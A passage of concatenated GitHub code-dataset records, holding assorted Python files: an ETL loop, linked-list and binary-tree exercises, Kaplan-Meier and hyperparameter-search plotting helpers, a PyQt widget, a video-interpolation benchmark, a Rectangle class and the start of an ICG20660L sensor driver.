'pyonmttok', 'python-Levenshtein'],\r\n data_files=[('romanizer', ['romanizer/dakshina_lexicon.json'])]\r\n)\r\n","repo_name":"abhik1505040/Bangla-transliterator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"39866944952","text":"import logging\nimport time\nfrom datetime import datetime, MINYEAR, timezone\n\nfrom redis import Redis\n\nfrom settings import (\n app_config,\n elastic_config,\n logger_settings,\n postgres_dsn,\n redis_config\n)\nfrom extract import PostgresExtractor\nfrom load import ElasticLoader\nfrom state import State\nfrom query import get_query\n\n\nitersize = app_config.batch_size\nfreq = app_config.frequency\nindex = app_config.elastic_index\n\nstate = State(config=redis_config, redis_conn=Redis)\npostgres_extractor = PostgresExtractor(dsn=postgres_dsn)\nelastic_loader = ElasticLoader(config=elastic_config, state=state, index=index)\nelastic_loader.create_index_if_not_exists()\n\n\ndef etl(query: str) -> None:\n \"\"\"Загружает в elasticsearch данные пачками с помощью генераторов.\"\"\"\n data_generator = postgres_extractor.extract_data(query, itersize)\n elastic_loader.bulk_update(data_generator, itersize)\n\n\nif __name__ == '__main__':\n logging.basicConfig(**logger_settings)\n logger = logging.getLogger(__name__)\n\n while True:\n logger.info('Starting etl...')\n modified = state.get_state(\n 'modified',\n default=str(datetime(MINYEAR, 1, 1, tzinfo=timezone.utc))\n )\n\n try:\n query = get_query(modified)\n etl(query)\n\n except ValueError as er:\n logger.error('Error: %s', er)\n continue\n\n logger.info('Sleep %s seconds...', freq)\n time.sleep(freq)\n","repo_name":"brivazz/new_admin_panel_sprint_3","sub_path":"etl/postgres_to_es/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72028918596","text":"from typing import Any, Dict, Optional, Union\nfrom mypy_extensions import TypedDict\n\n\nclass LexiconItemInterface(TypedDict, total=True):\n form: str\n lemma: str\n pos: str # or with capital letters POS ?\n gloss: str\n features: Dict[str, Any] # when no features, equal to None ? or empty dict ?\n frequency: int\n\n\ntokenWithoutFeatures = LexiconItemInterface(\n form=\"eating\",\n lemma=\"eat\",\n pos=\"VERB\",\n gloss=\"manger\",\n frequency=178,\n features={},\n)\n\ntokenWithFeatures = LexiconItemInterface(\n form=\"eating\",\n lemma=\"eat\",\n pos=\"VERB\",\n gloss=\"manger\",\n frequency=178,\n features={\"featureInt\": 212, \"featureFloat\": 0.2113, \"featureStr\": \"qwerty\"},\n)\n","repo_name":"Arborator/arborator-backend","sub_path":"app/lexicon/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10735388199","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n \nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n \n def print_list(self):\n temp = self.head\n while temp is not None:\n print(temp.value)\n temp = temp.next \n \n def make_empty(self):\n self.head = None\n self.tail = None\n self.length = 0\n\n def append(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n return True\n \n def get(self, index):\n if index < 0 or index >= self.length:\n return None\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n\n def reverse_between(self, start:int, end:int):\n ##### solution 2 #####\n # check if there is anything in the list\n if not self.head:\n return None\n \n # create a dummy node and connect it to the head. Create previous node to = dummy\n dummy = Node(0)\n dummy.next = self.head\n prev = dummy\n\n # move prev to the node at one node before starting position.\n for _ in range(start):\n prev = prev.next\n \n # set current to the next node of prev.\n current = prev.next\n\n # Reverse the linked list from position m to n.\n for _ in range(end - start):\n after = current.next\n current.next = after.next\n after.next = prev.next\n prev.next = after\n # update the head of the linked list with the next node of the dummy.\n self.head = dummy.next\n ##### solution 1 #####\n \"\"\"\n if self.length == 0:\n return None\n \n # get first and last node\n start_node = self.get(start)\n end_node = self.get(end)\n \n \n for _ in range(end-start):\n prev_end_node = self.get(end-1)\n \n # switch positions\n temp = start_node.value\n start_node.value = end_node.value\n end_node.value = temp\n \n # move one step closer to each other\n start_node = start_node.next\n end_node = prev_end_node\n end -= 1\n # repeat until they are next to each other or on the same node\n if start_node is end_node:\n return True\n \"\"\"\n\n \n\n\n\nlinked_list = LinkedList(1)\nlinked_list.append(2)\nlinked_list.append(3)\nlinked_list.append(4)\nlinked_list.append(5)\n\nprint(\"Original linked list: \")\nlinked_list.print_list()\n\n# Reverse a sublist within the linked list\nlinked_list.reverse_between(2, 4)\nprint(\"Reversed sublist (2, 4): \")\nlinked_list.print_list()\n\n# Reverse another sublist within the linked list\nlinked_list.reverse_between(0, 4)\nprint(\"Reversed entire linked list: \")\nlinked_list.print_list()\n\n# Reverse a sublist of length 1 within the linked list\nlinked_list.reverse_between(3, 3)\nprint(\"Reversed sublist of length 1 (3, 3): \")\nlinked_list.print_list()\n\n# Reverse an empty linked list\nempty_list = LinkedList(1)\nempty_list.make_empty()\nempty_list.reverse_between(0, 0)\nprint(\"Reversed empty linked list: \")\nempty_list.print_list()\n\n\n\"\"\"\n EXPECTED OUTPUT:\n ----------------\n Original linked list: \n 1\n 2\n 3\n 4\n 5\n Reversed sublist (2, 4): \n 1\n 2\n 5\n 4\n 3\n Reversed entire linked list: \n 3\n 4\n 5\n 2\n 1\n Reversed sublist of length 1 (3, 3): \n 3\n 4\n 5\n 2\n 1\n Reversed empty linked list: \n None\n \n\"\"\"\n","repo_name":"athenasu/data_structures","sub_path":"LinkedList/15. Leetcode- reverse_between.py","file_name":"15. Leetcode- reverse_between.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"5130401816","text":"# Link to the problem : https://leetcode.com/problems/binary-tree-level-order-traversal/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\n\n# Recursive approach \n\nclass Solution:\n def levelOrder(self, root) :\n result = []\n self.TreeTraversal(root,0,result)\n return result\n \n def TreeTraversal(self,node,level,result):\n if(node == None):\n return \n \n if(len(result) < level + 1) :\n result.append([])\n \n result[level].append(node.val)\n self.TreeTraversal(node.left , level+1 , result)\n self.TreeTraversal(node.right , level+ 1 , result)","repo_name":"dsrao711/DSA-Together-HacktoberFest","sub_path":"Binary Trees/LevelOrder/LevelOrder-recursive.py","file_name":"LevelOrder-recursive.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"62"} +{"seq_id":"9980832274","text":"import matplotlib.pyplot as plt\nfrom lifelines import KaplanMeierFitter\n\n\ndef plot_km_curve_for_feature(early_relapse_df, dataframe, feature_identifier):\n \"\"\"\n Plot the Kaplan-Meier early_relapse curves for the specified one-hot encoded feature.\n\n Parameters:\n - early_relapse_df: The early_relapse data DataFrame.\n - dataframe: The DataFrame with one-hot encoded features.\n - feature_identifier: Either the name or the index of the one-hot encoded feature to plot.\n\n Returns: None\n \"\"\"\n\n kmf = KaplanMeierFitter()\n\n # Check if the identifier is an integer (indicating an index). If so, get the feature name by index.\n if isinstance(feature_identifier, int):\n feature_name = dataframe.columns[feature_identifier]\n else:\n feature_name = feature_identifier\n\n # Find common patients between the two dataframes\n common_patients = early_relapse_df.index.intersection(dataframe.index)\n\n # Group 0\n idx_0 = dataframe.loc[common_patients, feature_name] == 0\n patient_ids_0 = common_patients[idx_0]\n kmf.fit(early_relapse_df.loc[patient_ids_0, \"PFS_I_MONTHS\"], early_relapse_df.loc[patient_ids_0, \"PFS_I_MONTHS\"],\n label=f'{feature_name}_0')\n kmf.plot_survival_function()\n\n # Group 1\n idx_1 = dataframe.loc[common_patients, feature_name] == 1\n patient_ids_1 = common_patients[idx_1]\n kmf.fit(early_relapse_df.loc[patient_ids_1, \"PFS_I_MONTHS\"], early_relapse_df.loc[patient_ids_1, \"PFS_I_MONTHS\"],\n label=f'{feature_name}_1')\n kmf.plot_survival_function()\n\n plt.title(f\"Kaplan-Meier early_relapse Curve for {feature_name}\")\n plt.xlabel(\"Time\")\n plt.ylabel(\"Probability of early_relapse\")\n plt.grid(True)\n plt.show()\n\n\ndef plot_km_curve_for_features(survival_df, dataframe, features, value=1):\n \"\"\"\n Plot the Kaplan-Meier survival curves for a list of specified features based on a given value (0 or 1).\n\n Parameters:\n - survival_df: The survival data DataFrame.\n - dataframe: The DataFrame with one-hot encoded features.\n - features: List of features to plot.\n - value: The value (0 or 1) to filter the data on for all features. Default is 1.\n\n Returns: None\n \"\"\"\n kmf = KaplanMeierFitter()\n\n # Find common patients between the two dataframes\n common_patients = survival_df.index.intersection(dataframe.index)\n\n for feature in features:\n # Check if the feature is given as an integer (indicating index). If so, get the feature name by index.\n if isinstance(feature, int):\n feature = dataframe.columns[feature]\n\n idx = dataframe.loc[common_patients, feature] == value\n patient_ids = common_patients[idx]\n kmf.fit(survival_df.loc[patient_ids, \"PFS_I_MONTHS\"],\n survival_df.loc[patient_ids, \"early_relapse\"],\n label=feature)\n kmf.plot_survival_function()\n\n plt.title(f\"Kaplan-Meier early_relapse Curves\")\n plt.xlabel(\"Time\")\n plt.ylabel(\"Probability of early_relapse\")\n plt.grid(True)\n plt.legend()\n plt.show()\n\n","repo_name":"CereAle99/tesi","sub_path":"early_relapse/lib/km_curve_plot.py","file_name":"km_curve_plot.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"40114812803","text":"import sys\nimport glob\n\nfor fyle in glob.glob(\"./ends/*\"):\n ends,total,sample = [],{},fyle.split(\".\")[0]\n with open(fyle,'r') as inp:\n firstline = inp.readline()\n for line in inp:\n ends.append(line.strip())\n\n with open(sys.argv[1],'r') as inp:\n firstline = inp.readline()\n for line in inp:\n total[line.strip().split(\",\")[0]] = \",\".join(line.split(\",\")[1:])\n\n with open(fyle+'_compiled.csv','w') as outp:\n outp.write(firstline)\n for item in sorted(ends):\n outp.write(str(item)+\",\"+total[item])\n","repo_name":"zfmandell/the-workshop","sub_path":"end_strip.py","file_name":"end_strip.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12530675957","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\n\nclass BaseButton(QPushButton):\n\n def __init__(self, action, image, *args, **kw):\n super(BaseButton, self).__init__(*args, **kw)\n sze = QSize(24, 24)\n self.setFocusPolicy(Qt.NoFocus)\n self.clicked.connect(action)\n self.setMinimumSize(sze)\n self.setMaximumSize(sze)\n self.setIcon(QIcon(image))\n self.setStyleSheet('border: 0px solid #000000;')\n\nclass ToggleButton(BaseButton):\n\n def __init__(self, active, action, image_t, image_f, *args, **kw):\n super(ToggleButton, self).__init__(action, image_t, *args, **kw)\n self.status = active\n self._image_t = QIcon(image_t)\n self._image_f = QIcon(image_f)\n self.clicked.connect(self._toggle)\n self._set_icon()\n\n def _set_icon(self):\n if self.status:\n self.setIcon(self._image_t)\n else:\n self.setIcon(self._image_f)\n\n def _toggle(self):\n self.status = not self.status\n self._set_icon()\n return self.status\n","repo_name":"thrstnh/pymp","sub_path":"src/pymp/ui/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"39347506368","text":"x = int(input())\nn = int(input())\nm = []\ntotal = 0\nfor i in input().split():\n m.append(int(i))\nm.sort(reverse=True)\n\nfor i, brick in enumerate(m):\n l = (i) // x\n w = l * 0.65 * brick\n total += w\n\nprint(\"{:.3f}\".format(total))\n","repo_name":"LakeSuburbia/CodingGame","sub_path":"Puzzles/EASY/Python/BrickInTheWall.py","file_name":"BrickInTheWall.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71138712911","text":"import os\nimport sys\nsys.path.append('.')\nimport cv2\nimport math\nimport torch\nimport argparse\nimport numpy as np\nfrom torch.nn import functional as F\nfrom model.pytorch_msssim import ssim_matlab\nfrom model.RIFT import RIFT\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--oldmodel', dest='use_old_model', action='store_true', \n help='Use the old model in the RIFE repo')\nparser.add_argument('--hd', action='store_true', help='Use newer HD model')\nparser.add_argument('--cp', type=str, default=None, help='Load checkpoint from this path')\nparser.add_argument('--count', type=int, default=-1, help='Evaluate on the first count images')\nparser.add_argument('--multi', dest='multi', default=\"8,8,4\", type=str, metavar='M', \n help='Output M groups of flow') \nparser.add_argument('--each', dest='out_summary', action='store_false', \n help='Output the scores of each frame instead of outputting summary only')\n\nargs = parser.parse_args()\nargs.multi = [ int(m) for m in args.multi.split(\",\") ]\nif args.out_summary:\n endl = \"\\r\"\nelse:\n endl = \"\\n\"\n\nprint(f\"Args:\\n{args}\")\n\nif args.use_old_model:\n model = RIFT(use_old_model=True)\n model.load_model('checkpoints/rife.pth')\nelif args.hd:\n from model.rife_new.v4_0.RIFE_HDv3 import Model\n model = Model()\n if not hasattr(model, 'version'):\n model.version = 0\n # -1: rank. If rank <= 0, remove \"module\" prefix from state_dict keys.\n model.load_model('checkpoints/rife-hd.pth', -1)\n print(\"Loaded 3.x/4.x HD model.\")\nelse:\n model = RIFT(multi=args.multi)\n model.load_model(args.cp)\n\nmodel.eval()\nmodel.device()\n\npath = 'data/vimeo_triplet/'\ntestlist_path = path + 'tri_testlist.txt'\nf = open(testlist_path, 'r')\npsnr_list = []\nssim_list = []\n# Don't count empty lines (\"\\n\" or \"\\r\\n\")\ntotal_triplets = sum(len(line) > 2 for line in open(testlist_path, 'r'))\n\nfor i, line in enumerate(f):\n if args.count > 0 and i == args.count:\n break\n\n name = str(line).strip()\n if(len(name) <= 1):\n continue\n # print(path + 'sequences/' + name + '/im1.png')\n I0 = cv2.imread(path + 'sequences/' + name + '/im1.png')\n I1 = cv2.imread(path + 'sequences/' + name + '/im2.png')\n I2 = cv2.imread(path + 'sequences/' + name + '/im3.png')\n I0 = (torch.tensor(I0.transpose(2, 0, 1)).to(device) / 255.).unsqueeze(0)\n I2 = (torch.tensor(I2.transpose(2, 0, 1)).to(device) / 255.).unsqueeze(0)\n mid = model.inference(I0, I2)[0]\n ssim = ssim_matlab(torch.tensor(I1.transpose(2, 0, 1)).to(device).unsqueeze(0) / 255., torch.round(mid * 255).unsqueeze(0) / 255.).detach().cpu().numpy()\n mid = np.round((mid * 255).detach().cpu().numpy()).astype('uint8').transpose(1, 2, 0) / 255. \n I1 = I1 / 255.\n psnr = -10 * math.log10(((I1 - mid) * (I1 - mid)).mean())\n psnr_list.append(psnr)\n ssim_list.append(ssim)\n print(\"{}/{} {} PSNR {:.3f} Avg {:.3f}, SSIM {:.3f} Avg {:.3f}\".format( \\\n i+1, total_triplets, name, psnr, np.mean(psnr_list), ssim, np.mean(ssim_list)), end=endl)\n\nif args.out_summary:\n print()\n ","repo_name":"askerlee/rift","sub_path":"benchmark/Vimeo90K.py","file_name":"Vimeo90K.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"12644150751","text":"from lib import graph as graph_helper\nimport os\nfrom multiprocessing.pool import Pool\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--graph_dir\", type=str, help=\"input graph dir\", default=\"data/graphs/vecroad_4/graphs_junc/\"\n)\nparser.add_argument(\n \"--save_dir\", type=str, help=\"save wkt dir\", default=\"data/graphs/vecroad_4/graphs_junc_wkt/\"\n)\n\nargs = parser.parse_args()\n\nos.makedirs(args.save_dir, exist_ok=True)\n\ndef worker(f):\n print(f)\n name = f.split('.')[0]\n g = graph_helper.read_graph(os.path.join(args.graph_dir, f))\n g = g.clear_self()\n wkt = g.convert_rs_to_wkt()\n all_data = []\n for linestring in wkt:\n all_data.append((\"AOI_0_{}_img0\".format(name), linestring))\n df = pd.DataFrame(all_data, columns=['ImageId', 'WKT_Pix'])\n df.to_csv(os.path.join(args.save_dir, name + '.csv'), index=False)\n\nfiles = os.listdir(args.graph_dir)\npool = Pool()\npool.map(worker, files)\npool.close()\npool.join()\n","repo_name":"tansor/VecRoad","sub_path":"eval/graph2wkt.py","file_name":"graph2wkt.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"83"} +{"seq_id":"14741802068","text":"#!/usr/bin/python3\n\"\"\"This module contains the 'Rectangle' class\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Class 'Rectangle' declared and defined\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"Initialization method\"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n @property\n def width(self):\n \"\"\"Getter method retrieves 'width' attribute\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"Setter method that sets value for 'width' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\"Getter method that retrieves 'height' attribute\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"Setter method that sets value for 'height' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\"Getter method that retrieves 'x' attribute\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"Setter method that sets value for 'x' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"Getter method that retrieves 'y' attribute\"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"Setter method that sets value for 'y' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def __str__(self):\n \"\"\"String method to represent class instance\"\"\"\n return f\"[{self.__class__.__name__}] ({self.id}) {self.x}\\\n/{self.y} - {self.width}/{self.height}\"\n\n def area(self):\n \"\"\"Method that computes area of a rectangle\"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\"Method that prints to stdout the 'Rectangle' instance\n with the character '#'\n \"\"\"\n for i in range(self.y):\n print()\n for i in range(self.height):\n print(\" \" * self.x, end='')\n print(\"#\" * self.width)\n\n def update(self, *args, **kwargs):\n \"\"\"Method to assign an argument to each attribute\"\"\"\n if 'id' in kwargs and len(args) == 0:\n self.id = kwargs['id']\n elif len(args) > 0:\n self.id = args[0]\n if 'width' in kwargs and len(args) < 2:\n self.width = kwargs['width']\n elif len(args) > 1:\n self.width = args[1]\n if 'height' in kwargs and len(args) < 3:\n self.height = kwargs['height']\n elif len(args) > 2:\n self.height = args[2]\n if 'x' in kwargs and len(args) < 4:\n self.x = kwargs['x']\n elif len(args) > 3:\n self.x = args[3]\n if 'y' in kwargs and len(args) < 5:\n self.y = kwargs['y']\n elif len(args) > 4:\n self.y = args[4]\n\n def to_dictionary(self):\n \"\"\"Method that returns dictionary representation of\n a 'Rectangle' instance\n \"\"\"\n return {'id': self.id, 'width': self.width, 'height': self.height,\n 'x': self.x, 'y': self.y}\n","repo_name":"LeRoy-M/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34416854729","text":"\"\"\"Plotting functions.\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport hpbandster.core.result as hpres\nimport hpbandster.visualization as hpvis\n\n\ndef plot_lr_vs_filter(results: np.array) -> None:\n \"\"\"Plot the learning rate versus the number of filter.\n\n Args:\n result: Structure of metrics\n\n Returns:\n None\n \"\"\"\n\n final_errors = np.array([val_errors[-1] for _, _, val_errors in results])\n num_filters = [sum([config[k] for k in sorted(config.keys()) if k.startswith(\n 'num_filters')]) for _, config, _ in results]\n learning_rates = [config['lr'] for _, config, _ in results]\n\n sizes = 10 + 90 * final_errors\n plt.xscale('log')\n plt.xlabel('learning rate'), plt.ylabel('# filters')\n plt.title(\n 'size, color $\\\\propto$ validation error at epoch {}'.format(\n len(final_errors)))\n plt.scatter(learning_rates, num_filters, s=sizes, c=final_errors)\n plt.colorbar()\n plt.show()\n\n\ndef plot_error_curves(results: np.array) -> None:\n \"\"\"Plot the validation errors over time (epochs).\n\n Args:\n result: Structure of metrics\n\n Returns:\n None\n \"\"\"\n\n for _, _, val_errors in results:\n plt.plot(range(1, 10), val_errors)\n\n plt.xlabel('epochs'), plt.ylabel('validation error')\n plt.title('Learning curves for different hyperparameters')\n plt.axvline(1), plt.axvline(3), plt.axvline(9)\n plt.show()\n\n\ndef plot_finished_runs(result: hpres.Result) -> None:\n \"\"\"Plot the finished runs over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.finished_runs_over_time(all_runs)\n fig.set_size_inches((12, 12))\n plt.show()\n\n\ndef plot_rankings(result: hpres.Result) -> None:\n \"\"\"Plot the rank correlation.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.correlation_across_budgets(result)\n fig.set_size_inches((12, 12))\n plt.show()\n\n\ndef plot_losses(result: hpres.Result) -> None:\n \"\"\"Plot the losses over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.losses_over_time(all_runs)\n fig.set_size_inches((12, 12))\n plt.show()\n\n\ndef plot_histograms(result: hpres.Result) -> None:\n \"\"\"Plot the finished runs over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n id2conf = result.get_id2config_mapping()\n\n fig, ax = hpvis.performance_histogram_model_vs_random(all_runs, id2conf)\n fig.set_size_inches((12, 12))\n plt.show()\n","repo_name":"ercembu/freiburg","sub_path":"1-1/dl/dl2021-ex09-hpo-dl2021-pes/lib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72336197391","text":"import sys\nimport smbus\nimport time\nimport RPi.GPIO as GPIO\nimport spidev\n\nclass DFRobot_ICG20660L:\n IIC_ADDR_SDO_H = 0x69\n IIC_ADDR_SDO_L = 0x68\n ICG20660L_DEVICE_ID = 0x91\n CLOCK_SEL_PLL = 1\n ADC_MAX_RANGE = 32767.0\n GYRO_FULL_SCALE_125DPS = 125.0\n GYRO_FULL_SCALE_250DPS = 250.0\n GYRO_FULL_SCALE_500DPS = 500.0\n ACCEL_FULL_SCALE_2G = 2\n ACCEL_FULL_SCALE_4G = 4\n ACCEL_FULL_SCALE_8G = 8\n ACCEL_FULL_SCALE_16G = 16\n\n REG_ICG20660L_SMPLRT_DIV = 0x19\n \n REG_ICG20660L_ACCEL_CONFIG2= 0x1D\n '''\n #ACCELEROMETER CONFIGURATION 2, addr:0x1D,acess:rw\n # ---------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ---------------------------------------------------------\n # | FIFO_SIZE | DEC2_CFG | ACCEL_FCHOICE_B | A_DLPF_CFG |\n # ---------------------------------------------------------\n '''\n BIT_FIFO_SIZE = 6\n OFFSET_FIFO_SIZE = 0x03\n BIT_DEC2_CFG = 4\n OFFSET_DEC2_CFG = 0x03\n BIT_ACCEL_FCHOICE_B = 3\n OFFSET_ACCEL_FCHOICE_B = 0x01\n BIT_A_DLPF_CFG = 0\n OFFSET_A_DLPF_CFG = 0x07\n \n REG_ICG20660L_INT_ENABLE = 0x38\n '''\n #INT_ENABLE register:addr:0x38,acess:rw\n # -----------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -----------------------------------------------------------------\n # | WOM_EN | FIFO_OFLOW_EN | rsv | DATA_RDY_INT_EN |\n # -----------------------------------------------------------------\n '''\n BIT_WOM_EN = 5\n OFFSET_WOM_EN = 0x07\n BIT_FIFO_OFLOW_EN = 4\n OFFSET_FIFO_OFLOW_EN = 0x01\n BIT_DATA_RDY_INT_EN = 0\n OFFSET_DATA_RDY_INT_EN = 0x01\n \n \n REG_ICG20660L_PWR_MGMT_1 = 0x6B\n '''\n #PWR_MGMT_1 register description:addr:0x6B,acess:rw\n # -------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------\n # | DEVICE_RESET | SLEEP | CYCLE | GYRO_STANDBY | TEMP_DIS | CLKSEL[2:0] |\n # -------------------------------------------------------------------------\n '''\n BIT_DEVICE_RESET = 7\n OFFSET_DEVICE_RESET = 0x01\n BIT_SLEEP = 6\n OFFSET_SLEEP = 0x01\n BIT_CYCLE = 5\n OFFSET_CYCLE = 0x01\n BIT_GYRO_STANDBY = 4\n OFFSET_GYRO_STANDBY = 0x01\n BIT_TEMP_DIS = 3\n OFFSET_TEMP_DIS = 0x01\n BIT_CLKSEL = 0\n OFFSET_CLKSEL = 0x07\n\n REG_ICG20660L_PWR_MGMT_2 = 0x6C\n '''\n #PWR_MGMT_2 register:addr:0x6C,acess:rw\n # -------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------------\n # | FIFO_LP_EN | rsv | STBY_XA | STBY_YA | STBY_ZA | STBY_XG | STBY_YG | STBY_ZG|\n # -------------------------------------------------------------------------------\n '''\n BIT_FIFO_LP_EN = 7\n OFFSET_FIFO_LP_EN = 0x01\n BIT_STBY_XA = 5\n OFFSET_STBY_XA = 0x01\n BIT_STBY_YA = 4\n OFFSET_STBY_YA = 0x01\n BIT_STBY_ZA = 3\n OFFSET_STBY_ZA = 0x01\n BIT_STBY_XG = 2\n OFFSET_STBY_XG = 0x01\n BIT_STBY_YG = 1\n OFFSET_STBY_YG = 0x01\n BIT_STBY_ZG = 0\n OFFSET_STBY_ZG = 0x01\n\n REG_ICG20660L_FIFO_COUNTH = 0x72\n REG_ICG20660L_FIFO_COUNTL = 0x73\n REG_ICG20660L_FIFO_R_W = 0x74\n \n REG_ICG20660L_SELF_TEST_X_GYRO = 0x00\n REG_ICG20660L_SELF_TEST_Y_GYRO = 0x01\n REG_ICG20660L_SELF_TEST_Z_GYRO = 0x02\n REG_ICG20660L_XG_OFFS_TC_H = 0x04\n REG_ICG20660L_XG_OFFS_TC_L = 0x05\n REG_ICG20660L_YG_OFFS_TC_H = 0x07\n REG_ICG20660L_YG_OFFS_TC_L = 0x08\n REG_ICG20660L_ZG_OFFS_TC_H = 0x0A\n REG_ICG20660L_ZG_OFFS_TC_L = 0x0B\n REG_ICG20660L_SELF_TEST_X_ACCEL = 0x0D\n REG_ICG20660L_SELF_TEST_Y_ACCEL = 0x0E\n REG_ICG20660L_SELF_TEST_Z_ACCEL = 0x0F\n REG_ICG20660L_XG_OFFS_USRH = 0x13\n REG_ICG20660L_XG_OFFS_USRL = 0x14\n REG_ICG20660L_YG_OFFS_USRH = 0x15\n REG_ICG20660L_YG_OFFS_USRL = 0x16\n REG_ICG20660L_ZG_OFFS_USRH = 0x17\n REG_ICG20660L_ZG_OFFS_USRL = 0x18\n REG_ICG20660L_CONFIG = 0x1A\n '''\n #Config register:addr:0x1A,acess:rw\n # -------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------\n # | rsv | FIFO_MODE | EXT_SYNC_SET | DLPF_CFG |\n # -------------------------------------------------\n '''\n BIT_FIFO_MODE = 6\n OFFSET_FIFO_MODE = 0x01\n BIT_EXT_SYNC_SET = 3\n OFFSET_EXT_SYNC_SET = 0x07\n BIT_DLPF_CFG = 0\n OFFSET_DLPF_CFG = 0x07\n\n REG_ICG20660L_GYRO_CONFIG = 0x1B\n '''\n #GYRO_CONFIG register:addr:0x1B,acess:rw\n # -----------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -----------------------------------------------------\n # | XG_ST | YG_ST | ZG_ST | FS_SEL | rsv | FCHOICE_B |\n # -----------------------------------------------------\n '''\n BIT_XG_ST = 7\n OFFSET_XG_ST = 0x01\n BIT_YG_ST = 6\n OFFSET_YG_ST = 0x01\n BIT_ZG_ST = 5\n OFFSET_ZG_ST = 0x01\n BIT_FS_SEL = 3\n OFFSET_FS_SEL = 0x03\n BIT_FCHOICE_B = 0\n OFFSET_FCHOICE_B = 0x03\n\n REG_ICG20660L_ACCEL_CONFIG = 0x1C\n '''\n #ACCEL_CONFIG:addr:0x1C,acess:rw\n # -------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------\n # | XA_ST | 